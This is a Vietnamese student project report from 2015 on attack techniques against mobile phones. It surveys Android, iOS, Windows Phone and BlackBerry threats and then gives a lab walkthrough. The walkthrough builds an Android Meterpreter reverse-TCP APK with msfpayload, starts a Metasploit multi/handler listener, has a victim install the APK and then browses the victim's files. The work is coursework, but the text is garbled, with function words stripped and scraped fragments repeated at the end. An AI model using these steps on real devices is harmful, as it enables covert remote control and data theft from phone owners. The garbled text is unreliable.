TRƯỜNG CAO ĐẲNG CNTT HỮU NGHỊ VIỆT – HÀN KHOA CÔNG NGHỆ THÔNG TIN ĐỒ ÁN MÔN AN NINH MẠNG ĐỀ TÀI TÌM HIỂU MỘT SỐ KĨ THUẬT TẤN CÔNG THIẾT BỊ ĐIỆN THOẠI DI ĐỘNG GVHD: Th.S Lê Tự Thanh NHÓM 4: Trần Văn Lợi Huỳnh Thanh Cường LỚP: CCMM07A Đà Nẵng, ngày 15 tháng năm 2015 MỤC LỤC DANH MỤC HÌNH LỜI NÓI ĐẦU Thế kỉ XXI, song song với tốc độ phát triển đến chóng mặt lĩnh vực công nghệ thông tin phát triển ứng dụng, thiết bị di động trở thành xu hướng hợp thời Hiện nay, giới đời sống kinh tế tăng cao nhu cầu sử dụng công nghệ người ngày lớn với nhiều mục đích khác Do đó, theo thống kê IDC, tính riêng khu vực Châu Á – Thái Bình Dương quý 2/2014, có 13,8 triệu thiết bị di động sản xuất tiêu thụ khu vực Năm 2014, riêng vòng quý, tốc độ tăng trưởng sản xuất tiêu thụ smartphone tăng từ 16-24%, dẫn đến yêu cầu phát triển ứng dụng thiết bị di động vũ bão Cơn sốt smartphone khiến tất doanh nghiệp sản xuất ứng dụng phải giải toán lập trình nên ứng dụng vừa đẹp, vừa tiện dụng, vừa hay, phù hợp với thị hiếu nhu cầu người dùng Smartphone trở thành vật bất ly thân với nhiều người khả sử dụng linh hoạt hầu hết người dùng thường lưu danh bạ, tin nhắn, email hay hình ảnh mà chí thông tin tài cá nhân hay tài liệu công việc quan trọng điện thoại Và hết, sống giới nơi thứ kết nối với nhau, smartphone công cụ liên tục theo dõi vị trí người dùng để lập hồ sơ chi tiết địa điểm mà họ thường đến Do vậy, smartphone trở thành mục tiêu tối quan trọng cho hacker, thực tế cho thấy thiết bị di động smartphone sử dụng hệ điều hành iOS, Android, Blackbarry, mục tiêu công nhiều hacker thông qua phần mềm độc hại Theo hãng bảo mật NetQin(Trung Quốc) cho hay: Nữa đầu năm 2012, hãng phát 17676 chương trình phần mềm độc hại smartphone tăng gấp 42% so với tháng cuối năm 2011 Trong báo cáo chi tiết bảo mật di động giới, công ty phát khoảng 3,7 triệu điện thoại bị nhiễm phần mềm độc hại đa phần dành cho Android chiếm 78% tháng, phần lại hệ điều hành Symbian Nokia Phần mềm độc hại phát nhiều Trung Quốc, Nga, Mỹ Đây lí nhóm chúng em lựa chọn “Tìm Hiểu Một Số Kỹ Thuật Tấn Công Thiết Bị Điện Thoại Di Động” làm đề tài đố án môn An Ninh Mạng Qua đây, nhóm chúng em xin gửi lời cảm ơn chân thành đến thầy Lê Tự Thanh tận tình hướng dẫn, giúp đỡ, định hướng cho nhóm thực thành công đề tài này! Chương I: GIỚI THIỆU TỔNG QUAN VỀ AN NINH MẠNG 1.1 Giới thiệu An ninh mạng An ninh mạng lĩnh vực có nhiệm vụ bảo vệ thông tin cá nhân hoạt động liên quan đến máy tính cách phát hiện, ngăn chặn ứng phó với công từ bên ngoài; bảo vệ hệ thống mạng không bị phá hoại phần cứng hay chỉnh sửa liệu; cung cấp giải pháp, sách bảo vệ máy tính, hệ thống mạng nhằm ngăn cản người dùng trái phép hay mã độc hại xâm nhập vào Các yếu tố cần bảo vệ: - Dữ liệu - Tài nguyên hệ thống - Danh tiếng liệu bị đánh cắp 1.2 Tình hình An ninh mạng giới Tình hình an ninh mạng giới trở nên khó lườn hết Lực lượng tội phạm mạng ngày đông đảo, tinh vi gây vô vàng trở ngại việc bảo mật, thiệt hại lớn giới Theo thống kê trung tâm Nghiên cứu Chiến lược Quốc tế(CSIS) Hoa Kì, tổng thiệt hại giới ước đạt 445 tỷ USD Thế giới chứng kiến nhiều website tên tuổi tập đoàn lớn bị hacker công gây hậu lớn JP Morgan, Bank of America, Citigroup, Ebay 1.3 Tình hình An ninh mạng Việt Nam Tình hình an toàn, an ninh mạng Việt Nam tiếp tục diễn biến phức tạp, tồn nhiều sở gây nguy bị công, phá hoại hạ tầng mạng thông tin, ảnh hưởng tới an ninh quốc gia Từ báo cáo Kaspersky Symantec cho thấy, Việt Nam đứng thứ (3,96%) sau Nga (40%) Ấn Độ (8%) số dùng di động bị mã độc công nhiều giới, thứ giới số lượng địa IP nước dùng mạng máy tính ma công nước khác; thứ giới phát tán tin nhắn rác (giảm bậc so tháng 11/2013) đứng thứ 12 giới hoạt động công mạng Riêng năm 2014, Bộ Công an phát gần 6.000 trang bị công, chiếm quyền quản trị, chỉnh sửa nội dung (có 246 trang tên miền gov.vn) Đặc biệt, sau kiện giàn khoan HD 981 hạ đặt trái phép vùng đặc quyền kinh tế Việt Nam, tin tặc nước công 700 trang mạng Việt Nam 400 trang dịp Quốc khánh (2/9) để chèn nội dung xuyên tạc chủ quyền Việt Nam với quần đảo Hoàng Sa Có 220 website Việt Nam bị Hacker Trung Quốc công Vào cuối năm 2014, tin tặc mở đợt công vào trung tâm liệu VCCorp khiến nhiều tờ báo mà công ty vận hành kỹ thuật Dân trí, Người lao động, Soha, VNEconomy, Kenh14… bị tê liệt Theo khảo sát Bkav, 12/2014, người dùng Việt Nam tổn thất thiệt hại lên đến 8.500 tỷ đồng cố từ virus máy tính, chiếm 1% tổng thiệt hại giới Các công chủ yếu đến từ: 1.4 - Tin nhắn rác - Wifi miễn phí Việt Nam - Làm máy tính nhiễm virus từ USB - Các ứng dụng giã mạo di động - Mã độc - DDoS Tình hình An ninh mạng thiết bị di động Theo hãng bảo mật NetQin(Trung Quốc) cho hay: Nữa đầu năm 2012, hãng phát 17676 chương trình phần mềm độc hại smartphone tăng gấp 42% so với tháng cuối năm 2011 Trong báo cáo chi tiết bảo mật di động giới, công ty phát khoảng 3,7 triệu điện thoại bị nhiễm phần mềm độc hại đa phần dành cho Android chiếm 78% tháng, phần lại hệ điều hành Symbian Nokia Phần mềm độc hại phát nhiều Trung Quốc, Nga, Mỹ Chương II TÌM HIỂU MỘT SỐ KỸ THUẬT TẤN CÔNG THIẾT BỊ ĐIỆN THOẠI DI ĐỘNG 2.1 Hacking Android iOS Android đống phần mềm phát triển Google riêng cho thiết bị di động điện thoại thông minh máy tính bảng Nó bao gồm hệ thống điều hành, middleware ứng dụng quan trọng hệ điều hành di động Android dựa nhân Linux Các ứng dụng Android chạy sandbox Các tính hệ điều hành Android bao gồm: - - Khung ứng dụng cho phép tái sử dụng thay linh kiện Máy ảo Dalvik tối ưu hóa cho thiết bị di động Tích hợp trình duyệt dựa công cụ WebKit mã nguồn mở SQLite để lưu trữ liệu © Truyền thông hỗ trợ cấu trúc cho âm phổ biến, video, định dạng hình ảnh (MPEG4, H.264, MP3, AAC, AMR, JPG, PNG, GIF) Môi trường phát triển phong phú bao gồm trình giả lập thiết bị, công cụ để gỡ lỗi, nhớ hiệu suất profiling, plugin cho Eclipse IDE Cấu trúc hệ điều hành Android: Hình 1.1 Cấu trúc hệ điều hành Android Một số kĩ thuật công Thiết bị di động Android: 2.2 Hacking iOS: iOS hệ điều hành điện thoại di động phát triển Apple phân phối độc quyền cho phần cứng Apple Ban đầu, iOS công bố năm 2007 cho iPhone, sau mở rộng để hỗ trợ thiết bị khác Apple iPod Touch (tháng năm 2007), iPad (tháng năm 2010), iPad Mini (tháng 11 năm 2012) hệ thứ hai Apple Ttivi trở (tháng năm 2010) Đến cuối năm 2011, iOS chiếm 60% thị phần điện thoại thông minh máy tính bảng Cuối năm 2012, iOS chiếm 21% thị phần hệ điều hành điện thoại thông minh thị trường 43,6% thị trường hệ điều hành máy tính bảng Và đến tháng năm 2014, App Store Apple chứa 1.200.000 ứng dụng iOS, tải 60 tỷ lần Kĩ thuật công Thiết bị di động iOS: Jailbreaking phương pháp việc kiểm soát hệ điều hành iOS sử dụng thiết bị Apple Nó làm giãn thiết bị từ rào cản phụ thuộc vào ứng dụng mã nguồn độc quyền Apple cho phép người dùng sử dụng ứng dụng bên thứ ba sẵn cửa hàng ứng dụng thức Nó thực cách cài đặt sửa đổi vá lỗi kernel cho phép bạn chạy ứng dụng bên thứ ba chữ ký nhà cung cấp hệ điều hành Nó sử dụng để thêm nhiều chức cho tiện ích Apple chuẩn Nó cung cấp quyền truy cập root vào hệ thống điều hành cho phép tải ứng dụng bên thứ ba, chủ đề, phần mở rộng, vv Điều loại bỏ hạn chế sandbox, cho phép ứng dụng độc hại để truy cập tài nguyên di động hạn chế thông tin Khi Jailbreak hình thành rủi ro khác cho thiết bị bạn bao gồm: - Bãi bỏ bảo hành điện thoại bạn Hiệu suất Bricking thiết bị Nhiễm phần mềm độc hại 2.3 Hacking Windows Phone OS Windows Phone hệ điều hành hệ thứ hai phát triển Microsoft cho Windows Phone Đặc điểm quan trọng Windows Phone 8: - - Nó cho phép thiết bị có hình lớn vi xử lý đa lõi lên tới 64 lõi Thành phần cốt lõi Windows 8, bao gồm hạt nhân, hệ thống tập tin, trình điều khiển, mạng stack, thành phần an ninh, phương tiện truyền thông hỗ trợ đồ họa Internet Explorer 10, công nghệ đồ Nokia, đa nhiệm Hỗ trợ mã nguồn gốc (C C ++), đơn giản hóa porting từ tảng Android, Symbian, iOS - Nhà cung cấp kiểm soát xây dựng thương hiệu nguyên tố "ví tiền" thông qua SIM phần cứng điện thoại Unified Extensible Firmware Interface (UEFI) giao thức khởi động an toàn Firmware qua mạng không cho cập nhật Windows Phone Cải thiện hỗ trợ cho lưu trữ di động chia tin cậy Hình 1.2 Cấu trúc Windows Phone 2.4 Hacking BlackBerry BlackBerry OS hệ điều hành điện thoại di động độc quyền phát triển Research In Motion (RIM) cho dòng BlackBerry điện thoại thông minh thiết bị cầm tay Để công hệ điều hành BlackBerry khai thác Dịch Vụ Tin Nhắn Ngắn - Short Message Service (SMS) Một số kỹ thuật như: - SMS Backdoor Khai thác Email Phần mềm gián điệp FinSpy Mobile Chương III: MÔ PHỎNG KỸ THUẬT TẤN CÔNG NỀN TẢNG DI ĐỘNG 3.1 Mô hacking Android OS 3.1.1 Chuẩn bị: + máy ảo cài hệ điều hành kali linux + máy cài android 4.4 3.1.2 Thông tin ban đầu: + Địa IP máy công 192.168.159.132 + Cổng nhận kết nôi 443 3.1.3 Các bước tiến hành: Bước 1: cửa sổ terminal máy ảo kali linux tạo file huynhthanhcuong.apk Bằng lệnh “msfpayload android/merterpreter/reverse_tcp lhost = lport R > < tên file apk>” (sử dụng khung tải trọng Metasploit để khai thác) Hình 3.1 tạo file apk với tên huynhthanhcuong 10 Bước 2: Gõ msfconsole đến đến giao diện điều khiển Metasploit Hình 3.2 giao diện Metasploit Bước 3: Vì tải trọng ban đầu reverse_tcp nơi kẻ công mong đợi nạn nhân để kết nối với máy công,máy công phải thiết lập xử lý để xử lý kết nối vào cổng quy định Gõ lệnh : Use exploit/multi/handler ( sử dụng xử lý Metasploit , khai thác đa xử lý) Set payload android/meterpreter/reverse_tcp ( Đảm bảo tải trọng trùng với bước ) Bước 4: Cấu hình chuyển đổi cho tải trọng Metasploit , xác định bước Gõ lệnh: Set lhost 192.168.159.132 (Địa IP máy công) Set lport 443 (Cổng lắng nghe kết nối đảo ngược) Exploit (Bắt đầu lắng nghe kết nối) 11 Hình 3.3 sử dụng khai thác đa xử lý cấu hình chuyển đổi tải trọng Metasploit Bước 5: Chia file với đuôi apk vừa tạo lên internet máy nạn nhân tải cài vào máy Hình 3.4 Giao diện máy ảo chạy hệ điều hành android 12 Hình 3.5 Giao diện máy ảo chạy hệ điều hành android kích hoạt file huynhthanhcuong.apk Hình 3.6 Máy công nhận kết nối từ máy nạn nhân 13 Tới máy công bên nạn nhân điện thoại android , làm thứ với điện thoại nạn nhân Hình 3.7 Danh sách thư mục máy điện thoại Android 14 Hình 3.8 Thực download file huynhthanhcuong.apk thư mục download máy Android 3.2 Kết luận - Không nên cài đặt file Apk từ nguồn không rõ - Nếu thật muốn cài file Apk từ nguồn không rõ phải xem kiểm tra mã nguồn (Mã nguồn tham khảo Hacking - tutorial com) Tài Liệu Tham Khảo [1] Bộ CEHv8 Module 16 Hacking Mobile Platforms, Module 16- Hacking Mobile Platforms [2] http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphonetutorial-using-metasploit/#sthash.PXFG0pvc.h68PJa1W.dpbs 15 [...]... Giao di n máy ảo chạy hệ điều hành android khi đã kích hoạt file huynhthanhcuong.apk Hình 3.6 Máy tấn công đã nhận kết nối từ máy nạn nhân 13 Tới đây máy tấn công đã được bên trong nạn nhân là điện thoại android , có thể làm mọi thứ với điện thoại của nạn nhân Hình 3.7 Danh sách các thư mục trong máy điện thoại Android 14 Hình 3.8 Thực hiện download file huynhthanhcuong.apk trong thư mục download của...Bước 2: Gõ msfconsole đến đến giao di n điều khiển Metasploit Hình 3.2 giao di n Metasploit Bước 3: Vì tải trọng ban đầu là reverse_tcp nơi kẻ tấn công mong đợi các nạn nhân để kết nối với máy tấn công, máy tấn công phải thiết lập xử lý để xử lý những kết nối vào cổng đã được quy định ở trên Gõ lệnh : Use exploit/multi/handler... 192.168.159.132 (Địa chỉ IP máy tấn công) Set lport 443 (Cổng lắng nghe các kết nối đảo ngược) Exploit (Bắt đầu lắng nghe kết nối) 11 Hình 3.3 sử dụng khai thác đa xử lý và cấu hình chuyển đổi các tải trọng Metasploit Bước 5: Chia sẽ file với đuôi apk vừa tạo lên internet để cho máy nạn nhân tải và cài vào máy Hình 3.4 Giao di n của máy ảo chạy hệ điều hành android 12 Hình 3.5 Giao di n máy ảo chạy hệ điều ... Nga, Mỹ Chương II TÌM HIỂU MỘT SỐ KỸ THUẬT TẤN CÔNG THIẾT BỊ ĐIỆN THOẠI DI ĐỘNG 2.1 Hacking Android iOS Android đống phần mềm phát triển Google riêng cho thiết bị di động điện thoại thông minh... độc hại phát nhiều Trung Quốc, Nga, Mỹ Đây lí nhóm chúng em lựa chọn Tìm Hiểu Một Số Kỹ Thuật Tấn Công Thiết Bị Điện Thoại Di Động làm đề tài đố án môn An Ninh Mạng Qua đây, nhóm chúng em xin... Short Message Service (SMS) Một số kỹ thuật như: - SMS Backdoor Khai thác Email Phần mềm gián điệp FinSpy Mobile Chương III: MÔ PHỎNG KỸ THUẬT TẤN CÔNG NỀN TẢNG DI ĐỘNG 3.1 Mô hacking Android